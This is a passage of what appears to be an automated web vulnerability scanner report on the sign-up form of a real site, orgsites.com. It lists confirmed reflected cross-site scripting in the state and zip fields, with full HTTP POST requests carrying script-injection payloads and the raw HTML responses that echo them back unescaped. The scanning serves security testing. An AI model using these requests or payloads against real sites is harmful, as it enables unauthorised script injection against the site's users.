sans-serif" color="#002F1C" size="2"> Display street address on your site?</td><td><input type="radio" name="addrQ" value="Y"></td> <td><input type="radio" CHECKED name="addrQ" value="N"></td></tr> <tr><td><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> Display phone number on your site?</td><td><input type="radio" CHECKED name="phnQ" value="Y"></td> <td><input type="radio" CHECKED name="phnQ" value="N"></td></tr> <tr><td><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> Would you like the ability to show a map to this address?</td><td><input type="radio" name="mapQ" value="Y"></td> <td><input type="radio" CHECKED name="mapQ" value="N"></td></tr></table> </td></tr><tr><td colspan="2" align="left" valign="top"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> <hr/></td></tr><tr bgcolor="#ffffcc"><td colspan="2" align="left" valign="top"> <font face="Verdana, Arial, Helvetica, sans-serif" size="2"> <table width="100%"><tr><td align="left" valign="bottom"> <font face="Verdana, Arial, Helvetica, sans-serif" size="4"> <b>Describe your organization and choose your Website address</b></font></td></tr><tr><td width="100%" align="center" valign="top" bgcolor="#666633"> <img src=images/s.gif height="3" width="3"><br/></td></tr></table><table width="100%" cellspacing="0" cellpadding="6" border="0" bgcolor="#ffffcc"> <tr><td width="50%"><p/><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> <p/>Short description of your organization <br/><font size="1">(This description will appear in OrgSites' Directory)</font> <br/><textarea name="body" cols="40" rows="5" wrap="virtual">3</textarea> <p/>Please select your organization's type/category. (Your organization will be categorized in the OrgSites Directory so viewers can find you by type or category.)<div align="center"><p/> <select name="ccatg"><option value=Animals>Animals<OPTION VALUE=Animals>Animals<OPTION VALUE=Arts_Culture>Arts-Culture<OPTION VALUE=Business>Business<OPTION VALUE=Computers>Computers<OPTION VALUE=Disaster>Disaster<OPTION VALUE=Education>Education<OPTION VALUE=Environment>Environment<OPTION VALUE=Ethnic>Ethnic<OPTION VALUE=Fraternal>Fraternal<OPTION VALUE=Gov-Politics>Gov-Politics<OPTION VALUE=Health>Health<OPTION VALUE=Hobbies>Hobbies<OPTION VALUE=Religion>Religion<OPTION VALUE=Service>Service<OPTION VALUE=Social>Social<OPTION VALUE=Sports>Sports<OPTION VALUE=Youth>Youth<OPTION VALUE=Unique>Unique</select></div><p><p/>PICK YOUR INTERNET ADDRESS (Suffix):<p/> Because your Website is hosted for free by OrgSites.com, your organization does not have to purchase its own domain name. Your internet address must therefore begin with <b>www.orgsites.com</b>. Following this comes your state abbreviation (which is automatically supplied from the information you give above) and then the name you choose for your organization. Your full internet address for a website will look like this:<p align="center" /> <b>www.orgsites.com/state/<font size="3" color="#0000FF">name-you-choose</b></font> <p/> The only part of your URL that you will need to choose is the word or continuous character string for the NAME-YOU-CHOOSE (Suffix) portion of your address. Use a short, descriptive name that is easily associated with your group. <p/> The name must be a continuous string of letters, with no spaces, all lower case. DO NOT USE SPACES OR SPECIAL CHARACTERS. <B>(&#064; . &#035; &#036; &#037; &#094; &amp; | / + ' &quot; ? ~ &lt; &gt;)</B>. A hyphen (-) is OK to separate words. <font color=red>Do not supply your state abbreviation. That is supplied automatically. Supply only the very last part (<b>Suffix</b>) of your URL.</font><p/><center><font color="#0000FF" size="3"> <b>Suffix&nbsp;</b></font><input type="text" name="dir_name" size="10" value="Smith"><p/> </td></tr> <tr><td align="left" valign="middle" colspan="2"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> </font></td></tr></table><p/><p/><hr/><p/> <div align="center"> <input type="submit" name="submit" value="DONE ...Give me my site!"> <p/><font size="1" color="#FF0000">To Cancel This Sign-Up, <a href=javascript:close()>CLICK HERE</a></font> </div><input type="hidden" NAME="country" VALUE="USA"> <input type="hidden" NAME="valp" VALUE="not_used"> <input type="hidden" N..
- /002_Website.php3

/002_Website.php3 CONFIRMED

http://www.orgsites.com/002_Website.php3

Parameters

Parameter Type Value
firstN POST 3
lastN POST 3
email POST netsparker@example.com
email2 POST netsparker@example.com
user POST 3
passwrd1 POST 3
passwrd2 POST 3
title POST 3
street POST 3
city POST 3
state POST '"--></style></script><script>alert(0x002AC1)</script>
zip POST 3
phone POST 3
addrQ POST N
phnQ POST N
mapQ POST N
body POST 3
ccatg POST Animals
dir_name POST Smith
country POST USA
valp POST not_used
subs POST Y

Request

POST /002_Website.php3 HTTP/1.1
Referer: http://www.orgsites.com/002_Website.php3
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.orgsites.com
Cookie: idV[33741]=862673926; idV[49035]=198432167; idV[54622]=321812240; idV[52895]=1067304613; idV[48945]=693846868; idV[47313]=175002378; idV[1911]=282431166; idV[50350]=1848186732; idV[50023]=1244575100; idV[28256]=634765200; idV[50522]=1188109459; idV[34463]=897324517; idV[34546]=263065073; idV[34964]=1177416072; idV[35310]=1277277378; idV[40329]=1594343500; idV[43800]=1032077503; idV[38440]=233593925; idV[44345]=2105004117; idV[47371]=301324675
Content-Length: 329
Accept-Encoding: gzip, deflate

firstN=3&lastN=3&email=netsparker%40example.com&email2=netsparker%40example.com&user=3&passwrd1=3&passwrd2=3&title=3&street=3&city=3&state='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x002AC1)%3c%2fscript%3e&zip=3&phone=3&addrQ=N&phnQ=N&mapQ=N&body=3&ccatg=Animals&dir_name=Smith&country=USA&valp=not_used&subs=Y

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:56:24 GMT
Server: Apache/1.3.26 (Unix) AuthMySQL/2.20 PHP/4.1.2 mod_gzip/1.3.19.1a mod_ssl/2.8.9 OpenSSL/0.9.6g
X-Powered-By: PHP/4.1.2
Transfer-Encoding: chunked
Content-Type: text/html


<!--HTML 4.01 header information--><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" /><head><title>OrgSites Website Signup</title><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" /><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><meta http-EQUIV="Refresh" Content="1800" /><script type="text/javascript" language="javascript"><!--Beginvar submitcount=0;function checkFields(){ if (submitcount == 0) { submitcount++; return true; } else { alert("Please be patient ... we are processing your request now"); return false; }}//**End--></script> <script type="text/javascript" language="javascript"><!--Beginfunction OpenWindowT(url, name){ popupWin = window.open(url, name, 'scrollbars=1,toolbar=1,resizable=1,width=600,height=400,left=20,top=20')}//**End--></script></head><body bgcolor=\"#cccc99\" text=\"#666633\" link=\"#537492\" vlink=\"#000000\"><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><form action="002_Website.php3" method="post" onSubmit="return checkFields()"> <center> <!--<table width="450" cellpadding="5" cellspacing="0" border="1">--> <table width="500" cellpadding="5" cellspacing="0" border="1"> <tr bgcolor="#ffffcc"><td><font face="Verdana, Arial, Helvetica, sans-serif" size="2"> <table width="100%"><tr> <td align="left" valign="bottom"> <font face="Verdana, Arial, Helvetica, sans-serif" color="#000000" size="4"> <b>Get your FREE OrgSites Website! </b></font></td></tr><tr><td width="100%" align="left" valign="top" bgcolor="#666633"> <img src=images/s.gif height="3" width="3"> <font color="#FFFFFF" size="1">013011</font> <br/> </td></tr></table><table width="100%" cellspacing="0" cellpadding="6" border="0" bgcolor="#ffffcc"> <tr><td align="left" valign="top" colspan="2" width="100%"> <font color="#000000" face="Arial, Helvetica, sans-serif" size="2"> </td></tr><tr><td align="left" valign="top" width="50%"> <p/><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> <!--<table width="60%" cellpadding="3" cellspacing="0" border="0">--> <table width="100%" cellpadding="3" cellspacing="0" border="0"> <tr><td colspan="2" align="left" valign="top"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><font color="#FF0000" size="1">First, please read <a href="javascript:OpenWindowT('terms.html', '')"><b>ORGSITES' TERMS OF USE</b>.</a> If you disagree with any term of use, you should not use this site. [click <a href=javascript:close()>HERE</a> if you do not agree with the Terms of Use]</font><hr/><font color="#000000" size="2"><i>ALL FIELDS ARE REQUIRED. <br/>A VALID email address is REQUIRED.</i></font><p/></td></tr> <tr><td align="right" valign="top"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> <img src=images/s.gif height="1" width="200"><br clear="all" /><b>First Name</b></td><td align="left" valign="top"> <input type="text" name="firstN" size="15" value="3"> </td></tr> <tr><td align="right" valign="top"><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><b>Last Name</b></td><td align="left" valign="top"> <input type="text" name="lastN" size="15" value="3"> </td></tr> <tr><td align="right" valign="top"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><b>Email Address</b></td><td align="left" valign="top"> <input type="text" name="email" size="25" value="netsparker@example.com"></td></tr> <tr><td align="right" valign="top"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><b>re-enter Email Address</b></td><td align="left" valign="top"> <input type="text" name="email2" size="25" value=""></td></tr><tr><td align="right" valign="top"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><b>Choose your USER ID name</b></td><td align="left" valign="top"> <input type="text" name="user" size="15" value="3"></td></tr><tr><td align="right" valign="middle"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><b>Please choose a password</b></td><td align="left" valign="middle"> <input type="password" name="passwrd1" size="15" value="3"> </td></tr> <tr><td align="right" valign="middle"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><b>Type password again to verify</b></td><td align="left" valign="middle"> <input type="password" name="passwrd2" size=15 value=3> </td></tr></table></td></tr> <tr><td valign="top" width="50%"> <font face="Arial, Helvetica, sans-serif" color="#000000" size="2"> <table cellpadding="5" cellspacing="0" border="0"> <tr><td colspan="2" align="left" valign="bottom"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> <hr/><p/><b>Name or title of your organization</b><br/><font size="1">(This will be the title that appears on your Website, but you can change it later.)<br/>Examples: Horses, Model-T, Hang-Gliding<br/> <font color="#FF0000">The title requires letters and numbers. NO punctuation or HTML. Dashes, Blanks are OK between words.</font></font><br/><input type="text" name="title" size="40" value="3"><br/><b>Organization's street address</b> <br/><font size="1" color="#FF0000">A VALID address is needed for the Calendar Mapping Function</font><br/><input type="text" name="street" size="40" value="3"> </td></tr><tr><td align="left" valign="top"><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><b>City</b> <br/><font size="1" color="#FF0000">A VALID city is needed for the Calendar Mapping Function</font><br/><input type="text" name="city" size="15" value=3><br/><b>State</b> <br/><font size="1" color="#FF0000">A VALID state is needed for the Calendar Mapping Function</font><br/><select name="state"><option value=\'\"--></style></script><script>netsparker(0x002AC1)</script>>\'\"--></style></script><script>netsparker(0x002AC1)</script> <OPTION VALUE="AL">Alabama <OPTION VALUE="AK">Alaska <OPTION VALUE="AZ">Arizona <OPTION VALUE="AR">Arkansas <OPTION VALUE="CA">California <OPTION VALUE="CO">Colorado <OPTION VALUE="CT">Connecticut <OPTION VALUE="DE">Delaware <OPTION VALUE="DC">D.C. <OPTION VALUE="FL">Florida <OPTION VALUE="GA">Georgia <OPTION VALUE="HI">Hawaii <OPTION VALUE="ID">Idaho <OPTION VALUE="IL">Illinois <OPTION VALUE="IN">Indiana <OPTION VALUE="IA">Iowa <OPTION VALUE="KS">Kansas <OPTION VALUE="KY">Kentucky <OPTION VALUE="LA">Louisiana <OPTION VALUE="ME">Maine <OPTION VALUE="MD">Maryland <OPTION VALUE="MA">Massachusetts <OPTION VALUE="MI">Michigan <OPTION VALUE="MN">Minnesota <OPTION VALUE="MS">Mississippi <OPTION VALUE="MO">Missouri <OPTION VALUE="MT">Montana <OPTION VALUE="NE">Nebraska <OPTION VALUE="NV">Nevada <OPTION VALUE="NH">New Hampshire <OPTION VALUE="NJ">New Jersey <OPTION VALUE="NM">New Mexico <OPTION VALUE="NY">New York <OPTION VALUE="NC">North Carolina <OPTION VALUE="ND">North Dakota <OPTION VALUE="OH">Ohio <OPTION VALUE="OK">Oklahoma <OPTION VALUE="OR">Oregon <OPTION VALUE="PA">Pennsylvania <OPTION VALUE="RI">Rhode Island <OPTION VALUE="SC">South Carolina <OPTION VALUE="SD">South Dakota <OPTION VALUE="TN">Tennessee <OPTION VALUE="TX">Texas <OPTION VALUE="UT">Utah <OPTION VALUE="VT">Vermont <OPTION VALUE="VA">Virginia <OPTION VALUE="WA">Washington <OPTION VALUE="DC">Washington D.C. <OPTION VALUE="WV">West Virginia <OPTION VALUE="WI">Wisconsin <OPTION VALUE="WY">Wyoming </SELECT><BR><b>Postal Code (ZIP)</b> <br/><font size="1" color="#FF0000">A VALID Postal Code is needed for the Calendar Mapping Function</font><br/><input type="text" name="zip" size="15" value="3"><br/><b>Phone# (555-555-5555)</b> <br/><font size="1" color="#FF0000">A VALID phone# is needed for people to contact you!!</font><br/><input type="text" name="phone" size="15" value="3"><br/></td></tr><tr><td colspan="2" align="left" valign="top"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><hr/><table border="0"><tr><td><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> &nbsp;</td><td align="center"><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> Y</td><td align="center"><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> N</td></tr><tr><td><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> Display street address on your site?</td><td><input type="radio" name="addrQ" value="Y"></td> <td><input type="radio" CHECKED name="addrQ" value="N"></td></tr> <tr><td><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> Display phone number on your site?</td><td><input type="radio" CHECKED name="phnQ" value="Y"></td> <td><input type="radio" CHECKED name="phnQ" value="N"></td></tr> <tr><td><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> Would you like the ability to show a map to this address?</td><td><input type="radio" name="mapQ" value="Y"></td> <td><input type="radio" CHECKED name="mapQ" value="N"></td></tr></table> </td></tr><tr><td colspan="2" align="left" valign="top"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> <hr/></td></tr><tr bgcolor="#ffffcc"><td colspan="2" align="left" valign="top"> <font face="Verdana, Arial, Helvetica, sans-serif" size="2"> <table width="100%"><tr><td align="left" valign="bottom"> <font face="Verdana, Arial, Helvetica, sans-serif" size="4"> <b>Describe your organization and choose your Website address</b></font></td></tr><tr><td width="100%" align="center" valign="top" bgcolor="#666633"> <img src=images/s.gif height="3" width="3"><br/></td></tr></table><table width="100%" cellspacing="0" cellpadding="6" border="0" bgcolor="#ffffcc"> <tr><td width="50%"><p/><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> <p/>Short description of your organization <br/><font size="1">(This description will appear in OrgSites' Directory)</font> <br/><textarea name="body" cols="40" rows="5" wrap="virtual">3</textarea> <p/>Please select your organization's type/category. (Your organization will be categorized in the OrgSites Directory so viewers can find you by type or category.)<div align="center"><p/> <select name="ccatg"><option value=Animals>Animals<OPTION VALUE=Animals>Animals<OPTION VALUE=Arts_Culture>Arts-Culture<OPTION VALUE=Business>Business<OPTION VALUE=Computers>Computers<OPTION VALUE=Disaster>Disaster<OPTION VALUE=Education>Education<OPTION VALUE=Environment>Environment<OPTION VALUE=Ethnic>Ethnic<OPTION VALUE=Fraternal>Fraternal<OPTION VALUE=Gov-Politics>Gov-Politics<OPTION VALUE=Health>Health<OPTION VALUE=Hobbies>Hobbies<OPTION VALUE=Religion>Religion<OPTION VALUE=Service>Service<OPTION VALUE=Social>Social<OPTION VALUE=Sports>Sports<OPTION VALUE=Youth>Youth<OPTION VALUE=Unique>Unique</select></div><p><p/>PICK YOUR INTERNET ADDRESS (Suffix):<p/> Because your Website is hosted for free by OrgSites.com, your organization does not have to purchase its own domain name. Your internet address must therefore begin with <b>www.orgsites.com</b>. Following this comes your state abbreviation (which is automatically supplied from the information you give above) and then the name you choose for your organization. Your full internet address for a website will look like this:<p align="center" /> <b>www.orgsites.com/state/<font size="3" color="#0000FF">name-you-choose</b></font> <p/> The only part of your URL that you will need to choose is the word or continuous character string for the NAME-YOU-CHOOSE (Suffix) portion of your address. Use a short, descriptive name that is easily associated with your group. <p/> The name must be a continuous string of letters, with no spaces, all lower case. DO NOT USE SPACES OR SPECIAL CHARACTERS. <B>(&#064; . &#035; &#036; &#037; &#094; &amp; | / + ' &quot; ? ~ &lt; &gt;)</B>. A hyphen (-) is OK to separate words. <font color=red>Do not supply your state abbreviation. That is supplied automatically. Supply only the very last part (<b>Suffix</b>) of your URL.</font><p/><center><font color="#0000FF" size="3"> <b>Suffix&nbsp;</b></font><input type="text" name="dir_name" size="10" value="Smith"><p/> </td></tr> <tr><td align="left" valign="middle" colspan="2"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> </font></td></tr></table><p/><p/><hr/><p/> <div align="center"> <input type="submit" name="submit" value="DONE ...Give me my site!"> <p/><font size="1" color="#FF0000">To Cancel This Sign-Up, <a href=javascript:close()>CLICK HERE</a></font> </div><input type="hidden" NAME="country" VALUE="USA"> <input type="hidden" ..
- /002_Website.php3

/002_Website.php3 CONFIRMED

http://www.orgsites.com/002_Website.php3

Parameters

Parameter Type Value
firstN POST 3
lastN POST 3
email POST netsparker@example.com
email2 POST netsparker@example.com
user POST 3
passwrd1 POST 3
passwrd2 POST 3
title POST 3
street POST 3
city POST 3
state POST 3
zip POST '"--></style></script><script>alert(0x002AC4)</script>
phone POST 3
addrQ POST N
phnQ POST N
mapQ POST N
body POST 3
ccatg POST Animals
dir_name POST Smith
country POST USA
valp POST not_used
subs POST Y

Request

POST /002_Website.php3 HTTP/1.1
Referer: http://www.orgsites.com/002_Website.php3
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.orgsites.com
Cookie: idV[33741]=862673926; idV[49035]=198432167; idV[54622]=321812240; idV[52895]=1067304613; idV[48945]=693846868; idV[47313]=175002378; idV[1911]=282431166; idV[50350]=1848186732; idV[50023]=1244575100; idV[28256]=634765200; idV[50522]=1188109459; idV[34463]=897324517; idV[34546]=263065073; idV[34964]=1177416072; idV[35310]=1277277378; idV[40329]=1594343500; idV[43800]=1032077503; idV[38440]=233593925; idV[44345]=2105004117; idV[47371]=301324675
Content-Length: 329
Accept-Encoding: gzip, deflate

firstN=3&lastN=3&email=netsparker%40example.com&email2=netsparker%40example.com&user=3&passwrd1=3&passwrd2=3&title=3&street=3&city=3&state=3&zip='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x002AC4)%3c%2fscript%3e&phone=3&addrQ=N&phnQ=N&mapQ=N&body=3&ccatg=Animals&dir_name=Smith&country=USA&valp=not_used&subs=Y

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:56:31 GMT
Server: Apache/1.3.26 (Unix) AuthMySQL/2.20 PHP/4.1.2 mod_gzip/1.3.19.1a mod_ssl/2.8.9 OpenSSL/0.9.6g
X-Powered-By: PHP/4.1.2
Transfer-Encoding: chunked
Content-Type: text/html


<!--HTML 4.01 header information--><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" /><head><title>OrgSites Website Signup</title><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" /><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><meta http-EQUIV="Refresh" Content="1800" /><script type="text/javascript" language="javascript"><!--Beginvar submitcount=0;function checkFields(){ if (submitcount == 0) { submitcount++; return true; } else { alert("Please be patient ... we are processing your request now"); return false; }}//**End--></script> <script type="text/javascript" language="javascript"><!--Beginfunction OpenWindowT(url, name){ popupWin = window.open(url, name, 'scrollbars=1,toolbar=1,resizable=1,width=600,height=400,left=20,top=20')}//**End--></script></head><body bgcolor=\"#cccc99\" text=\"#666633\" link=\"#537492\" vlink=\"#000000\"><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><form action="002_Website.php3" method="post" onSubmit="return checkFields()"> <center> <!--<table width="450" cellpadding="5" cellspacing="0" border="1">--> <table width="500" cellpadding="5" cellspacing="0" border="1"> <tr bgcolor="#ffffcc"><td><font face="Verdana, Arial, Helvetica, sans-serif" size="2"> <table width="100%"><tr> <td align="left" valign="bottom"> <font face="Verdana, Arial, Helvetica, sans-serif" color="#000000" size="4"> <b>Get your FREE OrgSites Website! </b></font></td></tr><tr><td width="100%" align="left" valign="top" bgcolor="#666633"> <img src=images/s.gif height="3" width="3"> <font color="#FFFFFF" size="1">013011</font> <br/> </td></tr></table><table width="100%" cellspacing="0" cellpadding="6" border="0" bgcolor="#ffffcc"> <tr><td align="left" valign="top" colspan="2" width="100%"> <font color="#000000" face="Arial, Helvetica, sans-serif" size="2"> </td></tr><tr><td align="left" valign="top" width="50%"> <p/><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> <!--<table width="60%" cellpadding="3" cellspacing="0" border="0">--> <table width="100%" cellpadding="3" cellspacing="0" border="0"> <tr><td colspan="2" align="left" valign="top"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><font color="#FF0000" size="1">First, please read <a href="javascript:OpenWindowT('terms.html', '')"><b>ORGSITES' TERMS OF USE</b>.</a> If you disagree with any term of use, you should not use this site. [click <a href=javascript:close()>HERE</a> if you do not agree with the Terms of Use]</font><hr/><font color="#000000" size="2"><i>ALL FIELDS ARE REQUIRED. <br/>A VALID email address is REQUIRED.</i></font><p/></td></tr> <tr><td align="right" valign="top"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> <img src=images/s.gif height="1" width="200"><br clear="all" /><b>First Name</b></td><td align="left" valign="top"> <input type="text" name="firstN" size="15" value="3"> </td></tr> <tr><td align="right" valign="top"><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><b>Last Name</b></td><td align="left" valign="top"> <input type="text" name="lastN" size="15" value="3"> </td></tr> <tr><td align="right" valign="top"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><b>Email Address</b></td><td align="left" valign="top"> <input type="text" name="email" size="25" value="netsparker@example.com"></td></tr> <tr><td align="right" valign="top"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><b>re-enter Email Address</b></td><td align="left" valign="top"> <input type="text" name="email2" size="25" value=""></td></tr><tr><td align="right" valign="top"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><b>Choose your USER ID name</b></td><td align="left" valign="top"> <input type="text" name="user" size="15" value="3"></td></tr><tr><td align="right" valign="middle"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><b>Please choose a password</b></td><td align="left" valign="middle"> <input type="password" name="passwrd1" size="15" value="3"> </td></tr> <tr><td align="right" valign="middle"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><b>Type password again to verify</b></td><td align="left" valign="middle"> <input type="password" name="passwrd2" size=15 value=3> </td></tr></table></td></tr> <tr><td valign="top" width="50%"> <font face="Arial, Helvetica, sans-serif" color="#000000" size="2"> <table cellpadding="5" cellspacing="0" border="0"> <tr><td colspan="2" align="left" valign="bottom"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> <hr/><p/><b>Name or title of your organization</b><br/><font size="1">(This will be the title that appears on your Website, but you can change it later.)<br/>Examples: Horses, Model-T, Hang-Gliding<br/> <font color="#FF0000">The title requires letters and numbers. NO punctuation or HTML. Dashes, Blanks are OK between words.</font></font><br/><input type="text" name="title" size="40" value="3"><br/><b>Organization's street address</b> <br/><font size="1" color="#FF0000">A VALID address is needed for the Calendar Mapping Function</font><br/><input type="text" name="street" size="40" value="3"> </td></tr><tr><td align="left" valign="top"><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><b>City</b> <br/><font size="1" color="#FF0000">A VALID city is needed for the Calendar Mapping Function</font><br/><input type="text" name="city" size="15" value=3><br/><b>State</b> <br/><font size="1" color="#FF0000">A VALID state is needed for the Calendar Mapping Function</font><br/><select name="state"><option value=3>3 <OPTION VALUE="AL">Alabama <OPTION VALUE="AK">Alaska <OPTION VALUE="AZ">Arizona <OPTION VALUE="AR">Arkansas <OPTION VALUE="CA">California <OPTION VALUE="CO">Colorado <OPTION VALUE="CT">Connecticut <OPTION VALUE="DE">Delaware <OPTION VALUE="DC">D.C. <OPTION VALUE="FL">Florida <OPTION VALUE="GA">Georgia <OPTION VALUE="HI">Hawaii <OPTION VALUE="ID">Idaho <OPTION VALUE="IL">Illinois <OPTION VALUE="IN">Indiana <OPTION VALUE="IA">Iowa <OPTION VALUE="KS">Kansas <OPTION VALUE="KY">Kentucky <OPTION VALUE="LA">Louisiana <OPTION VALUE="ME">Maine <OPTION VALUE="MD">Maryland <OPTION VALUE="MA">Massachusetts <OPTION VALUE="MI">Michigan <OPTION VALUE="MN">Minnesota <OPTION VALUE="MS">Mississippi <OPTION VALUE="MO">Missouri <OPTION VALUE="MT">Montana <OPTION VALUE="NE">Nebraska <OPTION VALUE="NV">Nevada <OPTION VALUE="NH">New Hampshire <OPTION VALUE="NJ">New Jersey <OPTION VALUE="NM">New Mexico <OPTION VALUE="NY">New York <OPTION VALUE="NC">North Carolina <OPTION VALUE="ND">North Dakota <OPTION VALUE="OH">Ohio <OPTION VALUE="OK">Oklahoma <OPTION VALUE="OR">Oregon <OPTION VALUE="PA">Pennsylvania <OPTION VALUE="RI">Rhode Island <OPTION VALUE="SC">South Carolina <OPTION VALUE="SD">South Dakota <OPTION VALUE="TN">Tennessee <OPTION VALUE="TX">Texas <OPTION VALUE="UT">Utah <OPTION VALUE="VT">Vermont <OPTION VALUE="VA">Virginia <OPTION VALUE="WA">Washington <OPTION VALUE="DC">Washington D.C. <OPTION VALUE="WV">West Virginia <OPTION VALUE="WI">Wisconsin <OPTION VALUE="WY">Wyoming </SELECT><BR><b>Postal Code (ZIP)</b> <br/><font size="1" color="#FF0000">A VALID Postal Code is needed for the Calendar Mapping Function</font><br/><input type="text" name="zip" size="15" value="\'\"--></style></script><script>netsparker(0x002AC4)</script>"><br/><b>Phone# (555-555-5555)</b> <br/><font size="1" color="#FF0000">A VALID phone# is needed for people to contact you!!</font><br/><input type="text" name="phone" size="15" value="3"><br/></td></tr><tr><td colspan="2" align="left" valign="top"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><hr/><table border="0"><tr><td><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> &nbsp;</td><td align="center"><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> Y</td><td align="center"><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> N</td></tr><tr><td><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> Display street address on your site?</td><td><input type="radio" name="addrQ" value="Y"></td> <td><input type="radio" CHECKED name="addrQ" value="N"></td></tr> <tr><td><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> Display phone number on your site?</td><td><input type="radio" CHECKED name="phnQ" value="Y"></td> <td><input type="radio" CHECKED name="phnQ" value="N"></td></tr> <tr><td><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> Would you like the ability to show a map to this address?</td><td><input type="radio" name="mapQ" value="Y"></td> <td><input type="radio" CHECKED name="mapQ" value="N"></td></tr></table> </td></tr><tr><td colspan="2" align="left" valign="top"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> <hr/></td></tr><tr bgcolor="#ffffcc"><td colspan="2" align="left" valign="top"> <font face="Verdana, Arial, Helvetica, sans-serif" size="2"> <table width="100%"><tr><td align="left" valign="bottom"> <font face="Verdana, Arial, Helvetica, sans-serif" size="4"> <b>Describe your organization and choose your Website address</b></font></td></tr><tr><td width="100%" align="center" valign="top" bgcolor="#666633"> <img src=images/s.gif height="3" width="3"><br/></td></tr></table><table width="100%" cellspacing="0" cellpadding="6" border="0" bgcolor="#ffffcc"> <tr><td width="50%"><p/><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> <p/>Short description of your organization <br/><font size="1">(This description will appear in OrgSites' Directory)</font> <br/><textarea name="body" cols="40" rows="5" wrap="virtual">3</textarea> <p/>Please select your organization's type/category. (Your organization will be categorized in the OrgSites Directory so viewers can find you by type or category.)<div align="center"><p/> <select name="ccatg"><option value=Animals>Animals<OPTION VALUE=Animals>Animals<OPTION VALUE=Arts_Culture>Arts-Culture<OPTION VALUE=Business>Business<OPTION VALUE=Computers>Computers<OPTION VALUE=Disaster>Disaster<OPTION VALUE=Education>Education<OPTION VALUE=Environment>Environment<OPTION VALUE=Ethnic>Ethnic<OPTION VALUE=Fraternal>Fraternal<OPTION VALUE=Gov-Politics>Gov-Politics<OPTION VALUE=Health>Health<OPTION VALUE=Hobbies>Hobbies<OPTION VALUE=Religion>Religion<OPTION VALUE=Service>Service<OPTION VALUE=Social>Social<OPTION VALUE=Sports>Sports<OPTION VALUE=Youth>Youth<OPTION VALUE=Unique>Unique</select></div><p><p/>PICK YOUR INTERNET ADDRESS (Suffix):<p/> Because your Website is hosted for free by OrgSites.com, your organization does not have to purchase its own domain name. Your internet address must therefore begin with <b>www.orgsites.com</b>. Following this comes your state abbreviation (which is automatically supplied from the information you give above) and then the name you choose for your organization. Your full internet address for a website will look like this:<p align="center" /> <b>www.orgsites.com/state/<font size="3" 